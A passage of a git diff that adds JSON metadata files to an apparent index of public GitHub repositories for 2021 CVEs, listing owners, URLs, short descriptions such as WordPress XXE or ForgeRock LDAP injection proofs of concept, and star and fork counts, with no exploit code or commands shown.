+ "pushed_at": "2022-01-04T09:02:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29002.json b/2021/CVE-2021-29002.json
new file mode 100644
index 0000000000..5d603dde7a
--- /dev/null
+++ b/2021/CVE-2021-29002.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 786354845,
+ "name": "CVE-2021-29002-1",
+ "full_name": "miguelc49\/CVE-2021-29002-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-29002-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:39:45Z",
+ "updated_at": "2024-04-14T17:38:39Z",
+ "pushed_at": "2024-04-14T17:38:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29003.json b/2021/CVE-2021-29003.json
new file mode 100644
index 0000000000..f9f744df98
--- /dev/null
+++ b/2021/CVE-2021-29003.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 406636028,
+ "name": "CVE-2021-29003",
+ "full_name": "jaysharma786\/CVE-2021-29003",
+ "owner": {
+ "login": "jaysharma786",
+ "id": 46397588,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46397588?v=4",
+ "html_url": "https:\/\/github.com\/jaysharma786"
+ },
+ "html_url": "https:\/\/github.com\/jaysharma786\/CVE-2021-29003",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-15T06:14:47Z",
+ "updated_at": "2023-08-25T13:03:00Z",
+ "pushed_at": "2023-08-25T13:03:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29155.json b/2021/CVE-2021-29155.json
new file mode 100644
index 0000000000..38dea58c83
--- /dev/null
+++ b/2021/CVE-2021-29155.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 373563220,
+ "name": "CVE-2021-29155",
+ "full_name": "benschlueter\/CVE-2021-29155",
+ "owner": {
+ "login": "benschlueter",
+ "id": 25753058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25753058?v=4",
+ "html_url": "https:\/\/github.com\/benschlueter"
+ },
+ "html_url": "https:\/\/github.com\/benschlueter\/CVE-2021-29155",
+ "description": "Proof of Concept CVE-2021-29155 ",
+ "fork": false,
+ "created_at": "2021-06-03T15:53:10Z",
+ "updated_at": "2023-01-12T12:21:22Z",
+ "pushed_at": "2021-06-04T16:59:22Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29156.json b/2021/CVE-2021-29156.json
new file mode 100644
index 0000000000..f5b4ea0d0d
--- /dev/null
+++ b/2021/CVE-2021-29156.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 424232146,
+ "name": "CVE-2021-29156",
+ "full_name": "guidepointsecurity\/CVE-2021-29156",
+ "owner": {
+ "login": "guidepointsecurity",
+ "id": 9867431,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9867431?v=4",
+ "html_url": "https:\/\/github.com\/guidepointsecurity"
+ },
+ "html_url": "https:\/\/github.com\/guidepointsecurity\/CVE-2021-29156",
+ "description": "Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v13.0.0.",
+ "fork": false,
+ "created_at": "2021-11-03T13:21:50Z",
+ "updated_at": "2023-09-12T13:41:31Z",
+ "pushed_at": "2022-11-17T21:03:28Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 547217442,
+ "name": "CVE-2021-29156",
+ "full_name": "5amu\/CVE-2021-29156",
+ "owner": {
+ "login": "5amu",
+ "id": 39925709,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39925709?v=4",
+ "html_url": "https:\/\/github.com\/5amu"
+ },
+ "html_url": "https:\/\/github.com\/5amu\/CVE-2021-29156",
+ "description": "Exploit for CVE-2021-29156",
+ "fork": false,
+ "created_at": "2022-10-07T10:18:44Z",
+ "updated_at": "2023-09-28T11:43:16Z",
+ "pushed_at": "2022-10-08T19:19:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29200.json b/2021/CVE-2021-29200.json
new file mode 100644
index 0000000000..6000e8e5a5
--- /dev/null
+++ b/2021/CVE-2021-29200.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 366379721,
+ "name": "CVE-2021-29200",
+ "full_name": "freeide\/CVE-2021-29200",
+ "owner": {
+ "login": "freeide",
+ "id": 33774184,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4",
+ "html_url": "https:\/\/github.com\/freeide"
+ },
+ "html_url": "https:\/\/github.com\/freeide\/CVE-2021-29200",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-11T12:48:19Z",
+ "updated_at": "2021-05-11T12:48:20Z",
+ "pushed_at": "2021-05-11T10:42:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29267.json b/2021/CVE-2021-29267.json
new file mode 100644
index 0000000000..4c8f725e9e
--- /dev/null
+++ b/2021/CVE-2021-29267.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 352641545,
+ "name": "CVE-2021-29267",
+ "full_name": "Security-AVS\/CVE-2021-29267",
+ "owner": {
+ "login": "Security-AVS",
+ "id": 72926885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4",
+ "html_url": "https:\/\/github.com\/Security-AVS"
+ },
+ "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2021-29267",
+ "description": "SherlockIM ChatBot XSS",
+ "fork": false,
+ "created_at": "2021-03-29T12:50:23Z",
+ "updated_at": "2021-04-29T02:57:57Z",
+ "pushed_at": "2021-03-29T12:53:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29337.json b/2021/CVE-2021-29337.json
new file mode 100644
index 0000000000..ae79aebe4a
--- /dev/null
+++ b/2021/CVE-2021-29337.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 378779650,
+ "name": "CVE-2021-29337",
+ "full_name": "rjt-gupta\/CVE-2021-29337",
+ "owner": {
+ "login": "rjt-gupta",
+ "id": 35985127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35985127?v=4",
+ "html_url": "https:\/\/github.com\/rjt-gupta"
+ },
+ "html_url": "https:\/\/github.com\/rjt-gupta\/CVE-2021-29337",
+ "description": "CVE-2021-29337 - Privilege Escalation in MODAPI.sys (MSI Dragon Center)",
+ "fork": false,
+ "created_at": "2021-06-21T01:59:58Z",
+ "updated_at": "2024-01-13T11:15:44Z",
+ "pushed_at": "2021-10-12T12:03:20Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29349.json b/2021/CVE-2021-29349.json
new file mode 100644
index 0000000000..90b8a14d0d
--- /dev/null
+++ b/2021/CVE-2021-29349.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 353469792,
+ "name": "CVE-2021-29349",
+ "full_name": "0xBaz\/CVE-2021-29349",
+ "owner": {
+ "login": "0xBaz",
+ "id": 80262250,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80262250?v=4",
+ "html_url": "https:\/\/github.com\/0xBaz"
+ },
+ "html_url": "https:\/\/github.com\/0xBaz\/CVE-2021-29349",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-31T19:36:29Z",
+ "updated_at": "2021-05-22T11:00:46Z",
+ "pushed_at": "2021-03-31T19:36:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 358957574,
+ "name": "CVE-2021-29349",
+ "full_name": "Vulnmachines\/CVE-2021-29349",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-29349",
+ "description": "CVE-2021-29349 CSRF to remove all messages in Mahara 20.10",
+ "fork": false,
+ "created_at": "2021-04-17T18:48:38Z",
+ "updated_at": "2023-09-28T11:26:54Z",
+ "pushed_at": "2021-04-17T18:54:48Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29440.json b/2021/CVE-2021-29440.json
new file mode 100644
index 0000000000..9504b65017
--- /dev/null
+++ b/2021/CVE-2021-29440.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 374239784,
+ "name": "CVE-2021-29440",
+ "full_name": "CsEnox\/CVE-2021-29440",
+ "owner": {
+ "login": "CsEnox",
+ "id": 60170196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4",
+ "html_url": "https:\/\/github.com\/CsEnox"
+ },
+ "html_url": "https:\/\/github.com\/CsEnox\/CVE-2021-29440",
+ "description": "Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10",
+ "fork": false,
+ "created_at": "2021-06-06T00:51:21Z",
+ "updated_at": "2023-11-03T09:33:12Z",
+ "pushed_at": "2021-06-06T03:42:17Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29441.json b/2021/CVE-2021-29441.json
new file mode 100644
index 0000000000..1fe4815196
--- /dev/null
+++ b/2021/CVE-2021-29441.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 413725319,
+ "name": "nacos-cve-2021-29441",
+ "full_name": "hh-hunter\/nacos-cve-2021-29441",
+ "owner": {
+ "login": "hh-hunter",
+ "id": 91593280,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4",
+ "html_url": "https:\/\/github.com\/hh-hunter"
+ },
+ "html_url": "https:\/\/github.com\/hh-hunter\/nacos-cve-2021-29441",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-05T07:59:05Z",
+ "updated_at": "2021-10-05T07:59:17Z",
+ "pushed_at": "2021-10-05T07:59:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 470076597,
+ "name": "CVE-2021-29441",
+ "full_name": "bysinks\/CVE-2021-29441",
+ "owner": {
+ "login": "bysinks",
+ "id": 50199185,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50199185?v=4",
+ "html_url": "https:\/\/github.com\/bysinks"
+ },
+ "html_url": "https:\/\/github.com\/bysinks\/CVE-2021-29441",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-15T08:53:59Z",
+ "updated_at": "2024-05-20T00:42:46Z",
+ "pushed_at": "2022-03-15T08:56:39Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29447.json b/2021/CVE-2021-29447.json
new file mode 100644
index 0000000000..6fa0aeb3ef
--- /dev/null
+++ b/2021/CVE-2021-29447.json
@@ -0,0 +1,475 @@
+[
+ {
+ "id": 358714819,
+ "name": "CVE-2021-29447",
+ "full_name": "motikan2010\/CVE-2021-29447",
+ "owner": {
+ "login": "motikan2010",
+ "id": 3177297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4",
+ "html_url": "https:\/\/github.com\/motikan2010"
+ },
+ "html_url": "https:\/\/github.com\/motikan2010\/CVE-2021-29447",
+ "description": "WordPress - Authenticated XXE (CVE-2021-29447)",
+ "fork": false,
+ "created_at": "2021-04-16T20:41:26Z",
+ "updated_at": "2023-11-07T17:26:31Z",
+ "pushed_at": "2021-10-04T01:13:54Z",
+ "stargazers_count": 41,
+ "watchers_count": 41,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 41,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 370069665,
+ "name": "wordpress_cve-2021-29447",
+ "full_name": "Vulnmachines\/wordpress_cve-2021-29447",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/wordpress_cve-2021-29447",
+ "description": "WordPress XXE vulnerability",
+ "fork": false,
+ "created_at": "2021-05-23T14:08:34Z",
+ "updated_at": "2023-09-28T11:27:59Z",
+ "pushed_at": "2021-05-23T14:11:04Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 372785442,
+ "name": "CVE-2021-29447",
+ "full_name": "dnr6419\/CVE-2021-29447",
+ "owner": {
+ "login": "dnr6419",
+ "id": 43310843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4",
+ "html_url": "https:\/\/github.com\/dnr6419"
+ },
+ "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-29447",
+ "description": "Wordpress XXE injection 구축 자동화 및 PoC ",
+ "fork": false,
+ "created_at": "2021-06-01T10:10:25Z",
+ "updated_at": "2022-02-11T16:48:24Z",
+ "pushed_at": "2022-01-10T07:07:12Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 400614016,
+ "name": "CVE-2021-29447",
+ "full_name": "AssassinUKG\/CVE-2021-29447",
+ "owner": {
+ "login": "AssassinUKG",
+ "id": 5285547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4",
+ "html_url": "https:\/\/github.com\/AssassinUKG"
+ },
+ "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2021-29447",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-27T19:20:20Z",
+ "updated_at": "2021-08-27T19:25:06Z",
+ "pushed_at": "2021-08-27T19:25:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 562278922,
+ "name": "CVE-2021-29447-POC",
+ "full_name": "b-abderrahmane\/CVE-2021-29447-POC",
+ "owner": {
+ "login": "b-abderrahmane",
+ "id": 10504574,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10504574?v=4",
+ "html_url": "https:\/\/github.com\/b-abderrahmane"
+ },
+ "html_url": "https:\/\/github.com\/b-abderrahmane\/CVE-2021-29447-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-11-05T21:00:03Z",
+ "updated_at": "2022-11-16T04:06:35Z",
+ "pushed_at": "2023-12-15T05:23:38Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 562355122,
+ "name": "blind-xxe-controller-CVE-2021-29447",
+ "full_name": "elf1337\/blind-xxe-controller-CVE-2021-29447",
+ "owner": {
+ "login": "elf1337",
+ "id": 100080509,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100080509?v=4",
+ "html_url": "https:\/\/github.com\/elf1337"
+ },
+ "html_url": "https:\/\/github.com\/elf1337\/blind-xxe-controller-CVE-2021-29447",
+ "description": "Arbitrary file read controller based on CVE-2021-29447",
+ "fork": false,
+ "created_at": "2022-11-06T04:26:20Z",
+ "updated_at": "2023-04-28T22:17:00Z",
+ "pushed_at": "2022-11-11T06:27:31Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 562453027,
+ "name": "CVE-2021-29447-POC",
+ "full_name": "Val-Resh\/CVE-2021-29447-POC",
+ "owner": {
+ "login": "Val-Resh",
+ "id": 80176765,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80176765?v=4",
+ "html_url": "https:\/\/github.com\/Val-Resh"
+ },
+ "html_url": "https:\/\/github.com\/Val-Resh\/CVE-2021-29447-POC",
+ "description": "Proof of Concept for CVE-2021-29447 written in Python",
+ "fork": false,
+ "created_at": "2022-11-06T12:13:31Z",
+ "updated_at": "2022-11-07T01:04:59Z",
+ "pushed_at": "2022-11-06T12:59:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-29447",
+ "ethical-hacking",
+ "hack-the-box",
+ "hackthebox",
+ "proof-of-concept",
+ "wordpress",
+ "wordpress-security",
+ "xxe"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 564953103,
+ "name": "wordpress-cve-2021-29447",
+ "full_name": "M3l0nPan\/wordpress-cve-2021-29447",
+ "owner": {
+ "login": "M3l0nPan",
+ "id": 47189098,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47189098?v=4",
+ "html_url": "https:\/\/github.com\/M3l0nPan"
+ },
+ "html_url": "https:\/\/github.com\/M3l0nPan\/wordpress-cve-2021-29447",
+ "description": "Exploit WordPress Media Library XML External Entity Injection (XXE) to exfiltrate files.",
+ "fork": false,
+ "created_at": "2022-11-11T22:41:45Z",
+ "updated_at": "2023-07-27T01:42:30Z",
+ "pushed_at": "2022-11-11T22:51:52Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-29447",
+ "exploit",
+ "python",
+ "wordpress",
+ "xxe",
+ "xxe-injection"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 565951989,
+ "name": "exploit_cve-2021-29447",
+ "full_name": "mega8bit\/exploit_cve-2021-29447",
+ "owner": {
+ "login": "mega8bit",
+ "id": 6804084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6804084?v=4",
+ "html_url": "https:\/\/github.com\/mega8bit"
+ },
+ "html_url": "https:\/\/github.com\/mega8bit\/exploit_cve-2021-29447",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-11-14T17:05:27Z",
+ "updated_at": "2023-04-01T01:47:27Z",
+ "pushed_at": "2022-11-27T13:04:06Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 566137762,
+ "name": "CVE-2021-29447",
+ "full_name": "thomas-osgood\/CVE-2021-29447",
+ "owner": {
+ "login": "thomas-osgood",
+ "id": 20747585,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4",
+ "html_url": "https:\/\/github.com\/thomas-osgood"
+ },
+ "html_url": "https:\/\/github.com\/thomas-osgood\/CVE-2021-29447",
+ "description": "A Golang program to automate the execution of CVE-2021-29447",
+ "fork": false,
+ "created_at": "2022-11-15T03:15:59Z",
+ "updated_at": "2023-04-30T22:30:07Z",
+ "pushed_at": "2023-03-28T23:22:04Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": true,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 567344895,
+ "name": "CVE-2021-29447",
+ "full_name": "Abdulazizalsewedy\/CVE-2021-29447",
+ "owner": {
+ "login": "Abdulazizalsewedy",
+ "id": 64151982,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64151982?v=4",
+ "html_url": "https:\/\/github.com\/Abdulazizalsewedy"
+ },
+ "html_url": "https:\/\/github.com\/Abdulazizalsewedy\/CVE-2021-29447",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-11-17T15:38:22Z",
+ "updated_at": "2022-11-19T14:46:56Z",
+ "pushed_at": "2022-11-21T01:06:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 581991750,
+ "name": "CVE-2021-29447",
+ "full_name": "G01d3nW01f\/CVE-2021-29447",
+ "owner": {
+ "login": "G01d3nW01f",
+ "id": 75846902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4",
+ "html_url": "https:\/\/github.com\/G01d3nW01f"
+ },
+ "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-29447",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-12-25T07:44:21Z",
+ "updated_at": "2022-12-25T07:59:06Z",
+ "pushed_at": "2022-12-25T08:47:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 587419306,
+ "name": "CVE-2021-29447",
+ "full_name": "viardant\/CVE-2021-29447",
+ "owner": {
+ "login": "viardant",
+ "id": 84291326,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84291326?v=4",
+ "html_url": "https:\/\/github.com\/viardant"
+ },
+ "html_url": "https:\/\/github.com\/viardant\/CVE-2021-29447",
+ "description": "CVE-2021-29447 - Authenticated XXE Injection - WordPress < 5.7.1 & PHP > 8 ",
+ "fork": false,
+ "created_at": "2023-01-10T17:55:19Z",
+ "updated_at": "2023-01-17T16:08:43Z",
+ "pushed_at": "2023-01-17T16:16:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 592839280,
+ "name": "CVE-2021-29447-PoC",
+ "full_name": "0xRar\/CVE-2021-29447-PoC",
+ "owner": {
+ "login": "0xRar",
+ "id": 33517160,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33517160?v=4",
+ "html_url": "https:\/\/github.com\/0xRar"
+ },
+ "html_url": "https:\/\/github.com\/0xRar\/CVE-2021-29447-PoC",
+ "description": "A proof of concept exploit for a wordpress 5.6 media library vulnerability",
+ "fork": false,
+ "created_at": "2023-01-24T16:43:13Z",
+ "updated_at": "2024-03-08T13:10:48Z",
+ "pushed_at": "2023-01-31T21:37:34Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-29447",
+ "exploit-development",
+ "python3",
+ "websecurity",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 631754459,
+ "name": "CVE-2021-29447",
+ "full_name": "andyhsu024\/CVE-2021-29447",
+ "owner": {
+ "login": "andyhsu024",
+ "id": 131547485,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4",
+ "html_url": "https:\/\/github.com\/andyhsu024"
+ },
+ "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2021-29447",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-24T01:33:22Z",
+ "updated_at": "2023-04-24T01:33:23Z",
+ "pushed_at": "2023-04-30T15:23:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-29505.json b/2021/CVE-2021-29505.json
new file mode 100644
index 0000000000..4578ab1486
--- /dev/null
+++ b/2021/CVE-2021-29505.json
